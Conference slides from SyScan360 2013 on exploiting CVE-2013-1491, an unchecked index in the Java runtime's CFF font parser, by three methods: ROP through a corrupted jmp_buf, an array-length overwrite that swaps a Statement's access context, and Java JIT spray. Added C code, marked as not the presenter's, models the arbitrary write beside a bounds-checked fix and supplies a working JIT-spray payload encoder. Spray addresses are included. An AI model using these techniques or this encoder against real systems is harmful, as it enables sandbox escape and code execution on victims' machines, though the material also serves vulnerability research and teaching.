Exploit Your Java Native Vulnerabilities on Win7/JRE7 in One Minute
Yuki Chen (Twitter: @guhe120), SyScan360 2013

Slides on how to exploit Java memory corruption vulnerabilities, presented at SyScan360 2013.
Exploit Your Java Native Vulnerabilities on Win7/JRE7 in One Minute
Or: how to exploit a single Java vulnerability in three different ways

Today we are not talking about how to find 0-day Java native vulnerabilities, but about how to "cook" them.

About me
• Architect, Trend Micro China Development Center
• Interested in vulnerabilities, sandbox techniques, anti-APT solutions
• Hardcore ACG otaku

Agenda
• Background
• The vulnerability
• Exploit method 1
• Exploit method 2
• Exploit method 3
• Conclusion

What is a Java native vulnerability?
• A vulnerability that exists in JRE native code (C/C++ code)
  – Stack overflow
  – Heap overflow
  – Buffer overflow/underflow
  – …
• Also known as a Java memory corruption vulnerability

Trends of Java native vulnerability
(chart)

Exploiting a Java native vulnerability
• JRE 6
  – No DEP, no ASLR
  – Find a schoolchild and teach him heap spray
• JRE 7
  – The JRE 7 binaries opt in to DEP and ASLR, on Windows 7, Windows 8 …
  – Hmmm, seems much harder?
  – Actually not so hard; this presentation shows how

CVE-2013-1491
• Found by Joshua J. Drake (jduck)
• Used at Pwn2Own 2013 to defeat JRE 7 on Windows 8 (see Accuvant Labs' white paper)
• We also discovered the same issue in February 2013 with our Java font fuzzer, and finished the exploits in April 2013
CFF Font Instructions
• Compact Font Format, or Type 2 font
• You can write instructions (byte codes) that help build a character at runtime, for example:
  – 0A: call subroutine
  – 0B: return from subroutine
  – 0C 0A: add
  – 0C 0B: sub
  – 0C 0C: div
  – 0C 0D: load
  – (the Type 2 charstring spec also defines store as 0C 08 and put as 0C 14; the following slides use store and put)

Related Data Structures
• TopDictInfo (the parser's per-font structure)
  – buildCharArray: dynamically allocated array (the Type 2 transient array, written by put)
  – reg_WeightVector: static array inside the structure (the Type 2 WeightVector registry)

The two vulnerable instructions
• store [0, j, index, count]: reg_WeightVector[j + k] = buildCharArray[index + k] for k < count
• load [0, index, count]: buildCharArray[index + k] = reg_WeightVector[k] for k < count (per the Type 2 spec the registry side always starts at 0)
• No array boundary checks on store/load! The index operands come from the charstring operand stack, so j and index can be negative.

What can we do with it
• Read/write anywhere within a 16-bit index range around buildCharArray and reg_WeightVector
• The buildCharArray pointer itself lives in TopDictInfo, within reach of a negative reg_WeightVector index: overwriting it gives arbitrary address read/write through buildCharArray

Example
Initial state (figure): T->topDictData is the TopDictInfo at 0x2000000; inside it are the buildCharArray pointer field and reg_WeightVector (shown at 0x20007b4 and 0x200087c); buildCharArray points to the heap array at 0x2100000

Step 1: put(0, 0x0c0c0c0c)
  buildCharArray[0] = 0x0c0c0c0c;
Step 2: store(0, -18, 0, 1)
  reg_WeightVector[-18] = buildCharArray[0];
  Index -18 is the buildCharArray pointer field, which now holds 0x0c0c0c0c
Step 3: put(0, 0x41414141)
  buildCharArray[0] = 0x41414141;
  The write goes to 0x0c0c0c0c: an arbitrary 32-bit write. The same pointer swap turns reads of buildCharArray into an arbitrary read.
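The three steps above, as an added example that is not the presenter's code and not t2k.dll: a constructed C model of the two arrays and of the unchecked store, with a bounds-checked store beside it. The 32-bit address space is simulated as a small arena so the pointer overwrite reproduces on any host; the struct layout, array lengths, addresses and the target address (standing in for 0x0c0c0c0c) are all assumptions, and the slides' -18 index is not reproduced, the index is computed from this model's layout.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model, not t2k.dll code. The 32-bit address space is a small
 * arena and "pointers" are 32-bit offsets into it, so the pointer overwrite
 * from the slides reproduces on any host. */
#define ARENA_SIZE (1u << 16)
static uint8_t arena[ARENA_SIZE];

#define WV_LEN 16   /* reg_WeightVector length: assumed */
#define TA_LEN 32   /* buildCharArray length: assumed */

/* Simplified TopDictInfo; field order and padding are assumptions. */
typedef struct {
    uint32_t mem;               /* tsiMemObject* in the real structure */
    uint32_t buildCharArray;    /* pointer to the heap-allocated transient array */
    uint32_t buildCharArrayLen; /* only the hardened store consults this */
    uint32_t pad[8];
    int32_t  reg_WeightVector[WV_LEN];
} TopDictInfo;

#define T_ADDR  0x1000u  /* TopDictInfo location (arena offset), assumed */
#define TA_ADDR 0x2000u  /* buildCharArray allocation, assumed */
#define TARGET  0x8000u  /* stands in for 0x0c0c0c0c on the slides */

static uint32_t rd32(uint32_t a) { uint32_t v; memcpy(&v, arena + (a & (ARENA_SIZE - 1)), 4); return v; }
static void     wr32(uint32_t a, uint32_t v) { memcpy(arena + (a & (ARENA_SIZE - 1)), &v, 4); }
static uint32_t field(uint32_t T, size_t off) { return T + (uint32_t)off; }

/* put i: buildCharArray[i] = value */
static void cff_put(uint32_t T, int32_t i, uint32_t v) {
    uint32_t ta = rd32(field(T, offsetof(TopDictInfo, buildCharArray)));
    wr32(ta + 4u * (uint32_t)i, v);
}

/* store 0 j index count: reg_WeightVector[j+k] = buildCharArray[index+k].
 * Vulnerable version: j and index are signed and never range checked. */
static void cff_store_vuln(uint32_t T, int32_t j, int32_t index, uint16_t count) {
    uint32_t reg = field(T, offsetof(TopDictInfo, reg_WeightVector));
    uint32_t ta  = rd32(field(T, offsetof(TopDictInfo, buildCharArray)));
    for (uint16_t k = 0; k < count; k++)
        wr32(reg + 4u * (uint32_t)(j + k), rd32(ta + 4u * (uint32_t)(index + k)));
}

/* Hardened version: reject before touching memory; 0 on success, -1 if rejected. */
static int cff_store_safe(uint32_t T, int32_t j, int32_t index, uint16_t count) {
    uint32_t ta_len = rd32(field(T, offsetof(TopDictInfo, buildCharArrayLen)));
    if (j < 0 || index < 0) return -1;
    if ((uint32_t)j + count > WV_LEN) return -1;
    if ((uint32_t)index + count > ta_len) return -1;
    cff_store_vuln(T, j, index, count);  /* same copy loop, now known to be in range */
    return 0;
}

static void reset(void) {
    memset(arena, 0, sizeof arena);
    wr32(field(T_ADDR, offsetof(TopDictInfo, buildCharArray)), TA_ADDR);
    wr32(field(T_ADDR, offsetof(TopDictInfo, buildCharArrayLen)), TA_LEN);
}

/* reg_WeightVector index that lands on the buildCharArray pointer field
 * (-18 in the slides' layout; derived from this model's layout here). */
int32_t pointer_index(void) {
    return ((int32_t)offsetof(TopDictInfo, buildCharArray)
          - (int32_t)offsetof(TopDictInfo, reg_WeightVector)) / 4;
}

/* Steps 1-3 from the slides against the unchecked store.
 * Returns what ends up at TARGET: 0x41414141 if the write landed. */
uint32_t arbitrary_write_demo(void) {
    reset();
    cff_put(T_ADDR, 0, TARGET);                    /* step 1: buildCharArray[0] = target address */
    cff_store_vuln(T_ADDR, pointer_index(), 0, 1); /* step 2: pointer field = target address */
    cff_put(T_ADDR, 0, 0x41414141u);               /* step 3: now writes *TARGET */
    return rd32(TARGET);
}

typedef struct { int rc; uint32_t at_target; } SafeResult;

/* Same sequence against the hardened store: the pointer is never touched. */
SafeResult hardened_demo(void) {
    SafeResult r;
    reset();
    cff_put(T_ADDR, 0, TARGET);
    r.rc = cff_store_safe(T_ADDR, pointer_index(), 0, 1);
    cff_put(T_ADDR, 0, 0x41414141u);               /* lands in buildCharArray[0], not at TARGET */
    r.at_target = rd32(TARGET);
    return r;
}

int main(void) {
    SafeResult s = hardened_demo();
    printf("pointer index for this layout: %d\n", pointer_index());
    printf("vulnerable store: *0x%x = 0x%08x\n", TARGET, arbitrary_write_demo());
    printf("hardened store:   rc=%d, *0x%x = 0x%08x\n", s.rc, TARGET, s.at_target);
    return 0;
}
```

The fix is the usual one for this class of bug: every index the charstring supplies is validated against the length of the array it addresses before the copy loop runs, and the transient array's length has to be stored next to its pointer for that check to be possible at all.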
Information Leak + ROP

Information Leak
• Read a function pointer from the structure (the same missing bounds check works for reads)
• Subtract a pre-computed offset from that function pointer to get the base address of t2k.dll (the offset is fixed per t2k.dll build)
• Get the base of other DLLs (e.g. msvcrt) from the import address table (IAT) of t2k.dll

ROP
1. Write the ROP chain into buildCharArray
2. Set jmp_buf->eip to the first ROP gadget
3. Set jmp_buf->esp to buildCharArray (the stack pivot)
4. Trigger an internal error so that the parser calls longjmp, which loads esp and eip from the corrupted jmp_buf

  struct TopDictInfo {
      tsiMemObject *mem;
      …
  };
  struct tsiMemObject {
      …
      jmp_buf env;   /* saved registers, including esp and eip */
      …
  };
Overwrite Array Length + Statement

Java array in memory (32-bit HotSpot)
  Object header (8 bytes) | length (4 bytes) | a[0] | a[1] | … | a[n]
If we can overwrite the length field, we can read/write out of the bounds of this Java array from plain Java code, with no further native bug needed

Array Spray
(diagram: many arrays allocated back to back on the Java object heap, so that one of them sits at a predictable address)

Overwrite array length
• Set buildCharArray to 0x23ad27d8 (this address may vary between OS versions)
• Write 0x7fffffff to 0x23ad27d8, which becomes the new array length

Overwrite ACC in Statement object
• java.beans.Statement: calls a method on a target object
• AccessControlContext: checks permissions for privileged operations
• When a new Statement is created, its acc is set to a "snapshot" of the current calling context
• If you created the Statement in low-privileged code, the acc will be a low-privileged ACC
• We can replace the acc in memory with a powerful ACC

Statement object memory layout
  Object header | acc | target | … (acc replaced with a reference to the powerful ACC)

Method 2 – Exploit procedure
1. Allocate arrays (array spray)
2. Allocate the Statement object right after the array
3. Overwrite the array length (new length)
4. Overwrite the acc in the Statement with the powerful ACC, through the now out-of-bounds array

Demo
• Exploit CVE-2013-1491 using array length overwriting + Statement

Method 2 – Limitation
• You need to be able to overwrite memory on the Java object heap
  – The JVM has two heaps: the Java object heap (Java objects, Java arrays) and the Java native heap (the default heap used by JRE native code). A native bug that only reaches the native heap cannot corrupt an array length.
JIT Spray

History of JIT spray
• Dion Blazakis: Interpreter Exploitation: Pointer Inference and JIT Spraying
• Alexey Sintsov: Writing JIT-Spray Shellcode for Fun and Profit
• TT Tsai: The Flash JIT Spraying Is Back
• Mostly focused on Flash
• No practical PoC or guide for Java

Java JIT compiler
• The Java compiler (javac) turns source into bytecode in a class file
• The JIT compiler turns hot bytecode into native code at runtime

Java JIT compiler (cont.)
• View JIT-generated code
  – -XX:+UnlockDiagnosticVMOptions -XX:+PrintAssembly (needs the hsdis disassembler plugin in the JRE's bin directory; without it HotSpot only prints a warning)
• CompileThreshold
  – Only when a function has been called more than CompileThreshold times is it JIT compiled
  – Default value: 1500 for the client JVM (10000 for the server JVM)

XOR in the Java JIT compiler
  public int spray(int a) {
      int b = a;
      b ^= 0x90909090;
      b ^= 0x90909090;
      b ^= 0x90909090;
      return b;
  }
JIT output (PrintAssembly):
  0x01c21507: cmp 0x4(%ecx),%eax
  0x01c2150a: jne 0x01bbd100
  0x01c21510: mov %eax,0xffffc000(%esp)
  0x01c21517: push %ebp
  0x01c21518: sub $0x18,%esp
  0x01c2151b: xor $0x90909090,%edx
  0x01c21521: xor $0x90909090,%edx
  0x01c21527: xor $0x90909090,%edx
  …
  0x01c21539: ret

XOR in the Java JIT compiler (cont.)
• Each XOR statement is compiled into one six-byte instruction; with the constant 0x3C909090:
  – 81 F2 90 90 90 3C    xor edx, 0x3C909090
• We can replace the three NOP bytes (90 90 90) with our shellcode, three bytes per XOR

Set EIP in the middle
Aligned (what the JIT intended):
  $0:  81 F2 90 90 90 3C : xor edx, 0x3C909090
  $6:  81 F2 90 90 90 3C : xor edx, 0x3C909090
  $12: 81 F2 90 90 90 3C : xor edx, 0x3C909090
Misaligned (EIP set to $2, skipping the 81 F2 at $0):
  $2:  90      nop
  $3:  90      nop
  $4:  90      nop
  $5:  3C 81   cmp al, 0x81
  $7:  F2      repne (prefix on the next instruction)
  $8:  90      nop
  $9:  90      nop
  $10: 90      nop
  $11: 3C 81   cmp al, 0x81
  …
The 0x3C high byte of each immediate swallows the next instruction's 81 opcode as the operand of a harmless cmp, and the F2 ModRM byte becomes a prefix on the first payload byte, so execution never resynchronises with the aligned xor stream.
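The encoding the two slides above describe, as an added example that is not the presenter's tool: a constructed C generator that packs a payload three bytes per XOR constant, emits the Java statements and the machine code the JIT is assumed to produce (exactly 81 F2 imm32 per statement, as on the slides), and a checker that walks that code from offset 2 the way the CPU would, verifying the 3C 81 F2 glue between chunks. The payload, the buffer sizes and the "edx" register choice are assumptions; with a different constant the JIT may pick another register and therefore another ModRM byte, so confirm the bytes with PrintAssembly before spraying.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed encoder/checker for the XOR-based Java JIT spray on the slides,
 * not the presenter's tool. Every "b ^= 0x3Cxxxxxx;" is assumed to compile to
 * exactly 81 F2 xx xx xx 3C (xor edx, imm32), as the slides show. */
#define OP_XOR_EDX_IMM  0x81
#define MODRM_EDX       0xF2  /* reads as a REPNE prefix when executed misaligned */
#define GLUE_BYTE       0x3C  /* high byte of imm32: turns the next 0x81 into "cmp al, 0x81" */
#define ENTRY_OFFSET    2     /* where EIP is pointed: just past the 81 F2 of the first xor */
#define PAYLOAD_PER_XOR 3

/* Pack payload into imm32 constants, 3 bytes each, NOP padded. Returns constants written. */
size_t pack_constants(const uint8_t *payload, size_t len, uint32_t *out, size_t max_out) {
    size_t n = 0;
    for (size_t i = 0; i < len && n < max_out; i += PAYLOAD_PER_XOR, n++) {
        uint8_t b[PAYLOAD_PER_XOR] = {0x90, 0x90, 0x90};
        for (size_t k = 0; k < PAYLOAD_PER_XOR && i + k < len; k++) b[k] = payload[i + k];
        out[n] = ((uint32_t)GLUE_BYTE << 24) | ((uint32_t)b[2] << 16) | ((uint32_t)b[1] << 8) | b[0];
    }
    return n;
}

/* Java source for one sprayed statement, e.g. "b ^= 0x3C909090;" */
int java_xor_stmt(uint32_t c, char *buf, size_t buflen) {
    return snprintf(buf, buflen, "b ^= 0x%08X;", c);
}

/* Machine code the JIT is assumed to emit for the constants. Returns bytes written. */
size_t emit_code(const uint32_t *c, size_t n, uint8_t *code, size_t max_code) {
    size_t p = 0;
    for (size_t i = 0; i < n && p + 6 <= max_code; i++) {
        code[p++] = OP_XOR_EDX_IMM;        code[p++] = MODRM_EDX;
        code[p++] = (uint8_t)c[i];         code[p++] = (uint8_t)(c[i] >> 8);
        code[p++] = (uint8_t)(c[i] >> 16); code[p++] = (uint8_t)(c[i] >> 24);
    }
    return p;
}

/* Walk the code the way the CPU does from ENTRY_OFFSET: 3 payload bytes, then
 * the glue 3C 81 F2 (cmp al,0x81 + repne prefix) before the next 3. Returns the
 * recovered payload length, or 0 if any glue is wrong, i.e. the CPU would
 * resynchronise with the aligned xor stream and the payload would never run. */
size_t walk_misaligned(const uint8_t *code, size_t codelen, uint8_t *payload, size_t max_out) {
    size_t out = 0;
    for (size_t p = ENTRY_OFFSET; p + PAYLOAD_PER_XOR <= codelen; p += 6) {
        if (out + PAYLOAD_PER_XOR > max_out) return 0;
        memcpy(payload + out, code + p, PAYLOAD_PER_XOR);
        out += PAYLOAD_PER_XOR;
        if (p + 6 >= codelen) break;  /* last xor: no glue follows it */
        if (code[p + 3] != GLUE_BYTE || code[p + 4] != OP_XOR_EDX_IMM || code[p + 5] != MODRM_EDX)
            return 0;
    }
    return out;
}

static uint32_t g_consts[4];
static uint8_t  g_recovered[16];

/* Round trip on a constructed 4-byte payload (four int3). Returns recovered length. */
size_t roundtrip_demo(void) {
    static const uint8_t payload[] = {0xCC, 0xCC, 0xCC, 0xCC};
    uint8_t code[24];
    size_t n    = pack_constants(payload, sizeof payload, g_consts, 4);
    size_t clen = emit_code(g_consts, n, code, sizeof code);
    return walk_misaligned(code, clen, g_recovered, sizeof g_recovered);
}
uint32_t demo_constant(size_t i)  { roundtrip_demo(); return g_consts[i]; }
uint8_t  recovered_byte(size_t i) { roundtrip_demo(); return g_recovered[i]; }

/* Same walk over the slide's plain 0x90909090 constant: no 0x3C glue, so the
 * misaligned stream decodes back into a real xor and the walk reports failure. */
size_t bad_glue_demo(void) {
    uint32_t consts[2] = {0x90909090u, 0x90909090u};
    uint8_t code[12], rec[16];
    size_t clen = emit_code(consts, 2, code, sizeof code);
    return walk_misaligned(code, clen, rec, sizeof rec);
}

int main(void) {
    char line[32];
    size_t n = roundtrip_demo();
    for (size_t i = 0; i < 2; i++) { java_xor_stmt(demo_constant(i), line, sizeof line); puts(line); }
    printf("recovered %zu payload bytes; bad-glue walk returns %zu\n", n, bad_glue_demo());
    return 0;
}
```

Two caveats the checker makes visible: the first byte of every chunk executes under an F2 (REPNE) prefix, which is ignored for NOP and other plain one-byte opcodes but changes the meaning of SSE-encodable opcodes, so those must not sit in the first slot; and the sprayed stage 0 has to end with a jump out before the last 0x3C, whose cmp would otherwise take whatever byte follows the function as its operand.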
Find a reliable EIP to jump to
• 0x02cd70b7
  – Fairly reliable on the tested systems: Windows XP SP3, Windows 7 Home Edition, Windows 7 Enterprise Edition, Windows 8 Home Edition
  – The address lies inside the sprayed JIT code cache; it depends on the JRE build and the amount sprayed, so re-verify it for other builds

Spray multiple functions at runtime
• Generate classes JIT00001.class, JIT00002.class, … each holding a spray method, and load them from Exploit.class with ClassLoader.loadClass

Performance
• First version: 20 ~ 40 s to spray 2400 functions
  – Because each function has to be called 1500 times before it is JIT compiled
• With pre-warm-up: 7 ~ 9 s

Shellcode
• Two-staged
  – Stage 0: sprayed by the JIT functions; searches for the stage 1 shellcode and executes it (egg hunt)
  – Stage 1: defined in a Java string; does the real work

Demo
• Exploit CVE-2013-1491 using JIT spray

Add JIT spray to your PoC in one minute
• Demo
  – Add JIT spray to a CVE-2013-0809 PoC
  – We will publish all related code after the presentation

Optional demo
• JRE 7 native 0-day + Windows 8 + Java JIT spray

Java JIT spray – Limitation
• Currently only works on 32-bit platforms
• You need to be able to control EIP precisely
Conclusion
• We introduced three different methods to exploit a Java native vulnerability and bypass DEP/ASLR
• Choose the one that fits your vulnerability:
  – Choose JIT spray if you are on 32-bit and you can control EIP
  – Choose array + Statement if you can overwrite a Java array on the Java object heap
  – Choose information leak + ROP if you are Vupen

"Heapsprays are for the 99%"
"And so are JIT sprays."

Thank you! Q & A